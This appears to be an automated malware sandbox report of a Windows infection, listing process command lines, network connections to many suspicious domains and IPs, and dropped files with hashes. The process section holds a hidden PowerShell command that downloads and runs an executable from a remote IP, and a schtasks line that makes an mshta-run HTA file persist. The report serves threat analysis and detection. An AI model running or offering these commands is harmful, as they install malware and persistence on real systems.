"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2952 -childID 1 -isForBrowser -prefsHandle 3092 -prefMapHandle 3084 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd8b631e-889c-4d04-95d5-5f47b1f657a2} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3768 -childID 2 -isForBrowser -prefsHandle 3760 -prefMapHandle 2656 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fb1000a-5b0a-4287-ba1f-a802406fb8d8} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4532 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4488 -prefMapHandle 4548 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ada337d-3d57-4a67-9e56-019689dfa887} 868 "\\.\pipe\gecko-crash-server-pipe.868" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 3 -isForBrowser -prefsHandle 5260 -prefMapHandle 5256 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9825762a-9206-4b62-a43c-d05bccd37969} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 4 -isForBrowser -prefsHandle 5404 -prefMapHandle 5408 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cefbf1c8-a3c1-48a8-91dd-114db38a2a66} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 5 -isForBrowser -prefsHandle 5592 -prefMapHandle 5596 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {078f9894-34c5-4f6f-b514-41aca0c5dcc7} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe

"C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe"

C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe

"C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'T2V75N5KCPZXOWYLTGU2QWHAP8OYMKGH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.232:80 e5.o.lencr.org tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
CH 185.208.156.162:80 185.208.156.162 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
GB 142.250.180.14:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 142.250.180.14:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
N/A 127.0.0.1:63494 tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
N/A 127.0.0.1:63501 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.73:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2---sn-aigl6ns6.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com udp
NL 45.154.98.175:6969 tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 api.telegram.org udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/1752-0-0x0000000000E70000-0x000000000131B000-memory.dmp

memory/1752-1-0x00000000775A4000-0x00000000775A6000-memory.dmp

memory/1752-2-0x0000000000E71000-0x0000000000E9F000-memory.dmp

memory/1752-3-0x0000000000E70000-0x000000000131B000-memory.dmp

memory/1752-4-0x0000000000E70000-0x000000000131B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 4cf553af549bd99fa44da57de08620a8
SHA1 67e04f4434f0a63b082b0c8f148f5c100a77e27f
SHA256 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
SHA512 4ac6fae3a8aeda3a8a0e01d0e59385f674b72ccea57586b007a1a65e810c4063f2ea85a62f002b9fe522c2a986ae7faf2e0f3f5cb5cc5ccbd2a58851df7b2186

memory/1752-18-0x0000000000E70000-0x000000000131B000-memory.dmp

memory/4972-16-0x0000000000360000-0x000000000080B000-memory.dmp

memory/4972-19-0x0000000000361000-0x000000000038F000-memory.dmp

memory/4972-20-0x0000000000360000-0x000000000080B000-memory.dmp

memory/4972-21-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/4972-36-0x0000000000360000-0x000000000080B000-memory.dmp

memory/4972-37-0x0000000000360000-0x000000000080B000-memory.dmp

memory/4972-38-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd

MD5 c203adcd3b4b1717be1e79d7d234f89c
SHA1 a0c726c32766f5d3e3de1bdc9998da2bb2a657e4
SHA256 bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8
SHA512 724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368

memory/3236-52-0x0000000003510000-0x0000000003515000-memory.dmp

memory/3236-50-0x0000000003510000-0x0000000003515000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/2160-68-0x00000000008D0000-0x0000000000D6B000-memory.dmp

memory/4972-70-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/4596-88-0x00000000002B0000-0x0000000000320000-memory.dmp

memory/4596-89-0x00000000051D0000-0x0000000005774000-memory.dmp

memory/452-94-0x0000000000400000-0x0000000000466000-memory.dmp

memory/452-96-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2160-97-0x00000000008D0000-0x0000000000D6B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/4152-115-0x000002C5FCB80000-0x000002C5FCB92000-memory.dmp

memory/4152-116-0x000002C5FCF20000-0x000002C5FCF30000-memory.dmp

memory/452-119-0x0000000002DB0000-0x0000000002DB5000-memory.dmp

memory/452-117-0x0000000000400000-0x0000000000466000-memory.dmp

memory/4972-123-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/4496-138-0x0000000000A80000-0x0000000000AE0000-memory.dmp

memory/2668-140-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-142-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4536-144-0x0000000000360000-0x000000000080B000-memory.dmp

memory/4536-146-0x0000000000360000-0x000000000080B000-memory.dmp

memory/4972-147-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

memory/4152-227-0x000002C5FF720000-0x000002C5FFC48000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe

MD5 0eb68c59eac29b84f81ad6522d396f59
SHA1 aacfdf3cb1bdd995f63584f31526b11874fc76a5
SHA256 dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f
SHA512 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\vcruntime140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

MD5 123ad0908c76ccba4789c084f7a6b8d0
SHA1 86de58289c8200ed8c1fc51d5f00e38e32c1aad5
SHA256 4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43
SHA512 80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_ssl.pyd

MD5 90f080c53a2b7e23a5efd5fd3806f352
SHA1 e3b339533bc906688b4d885bdc29626fbb9df2fe
SHA256 fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4
SHA512 4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\libssl-3.dll

MD5 4ff168aaa6a1d68e7957175c8513f3a2
SHA1 782f886709febc8c7cebcec4d92c66c4d5dbcf57
SHA256 2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950
SHA512 c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_wmi.pyd

MD5 827615eee937880862e2f26548b91e83
SHA1 186346b816a9de1ba69e51042faf36f47d768b6c
SHA256 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32
SHA512 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_hashlib.pyd

MD5 a25bc2b21b555293554d7f611eaa75ea
SHA1 a0dfd4fcfae5b94d4471357f60569b0c18b30c17
SHA256 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d
SHA512 b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\zstandard\backend_c.pyd

MD5 0fc69d380fadbd787403e03a1539a24a
SHA1 77f067f6d50f1ec97dfed6fae31a9b801632ef17
SHA256 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc
SHA512 e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\vcruntime140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

MD5 e1c6ff3c48d1ca755fb8a2ba700243b2
SHA1 2f2d4c0f429b8a7144d65b179beab2d760396bfb
SHA256 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa
SHA512 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\charset_normalizer\md.pyd

MD5 71d96f1dbfcd6f767d81f8254e572751
SHA1 e70b74430500ed5117547e0cd339d6e6f4613503
SHA256 611e1b4b9ed6788640f550771744d83e404432830bb8e3063f0b8ec3b98911af
SHA512 7b10e13b3723db0e826b7c7a52090de999626d5fa6c8f9b4630fdeef515a58c40660fa90589532a6d4377f003b3cb5b9851e276a0b3c83b9709e28e6a66a1d32

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\charset_normalizer\md__mypyc.pyd

MD5 d8f690eae02332a6898e9c8b983c56dd
SHA1 112c1fe25e0d948f767e02f291801c0e4ae592f0
SHA256 c6bb8cad80b8d7847c52931f11d73ba64f78615218398b2c058f9b218ff21ca9
SHA512 e732f79f39ba9721cc59dbe8c4785ffd74df84ca00d13d72afa3f96b97b8c7adf4ea9344d79ee2a1c77d58ef28d3ddcc855f3cb13edda928c17b1158abcc5b4a

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\unicodedata.pyd

MD5 a8ed52a66731e78b89d3c6c6889c485d
SHA1 781e5275695ace4a5c3ad4f2874b5e375b521638
SHA256 bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7
SHA512 1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

